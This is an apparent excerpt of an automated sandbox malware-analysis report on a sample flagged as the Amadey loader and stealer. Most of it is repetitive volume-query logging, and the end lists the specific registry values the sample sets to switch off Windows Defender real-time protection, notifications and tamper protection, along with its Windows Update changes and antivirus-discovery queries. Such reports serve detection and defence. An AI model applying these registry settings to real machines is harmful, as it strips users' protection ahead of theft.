Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1071538001\f2d6093d56.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C56A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_6C56A8DC

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Code function: 2_2_6C4B8390 NSS_GetVersion,

2_2_6C4B8390

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: random.exe, 00000000.00000003.1762606937.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1769022616.0000000001947000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1807175860.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1763062913.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1762458805.0000000001947000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 42.2.483d2fa8a0d53818306efeb32d3.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ZMAQNBYDBTTIZOPR2YL2UK3KBOXR.exe.da0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.skotes.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1996632966.00000000001B1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
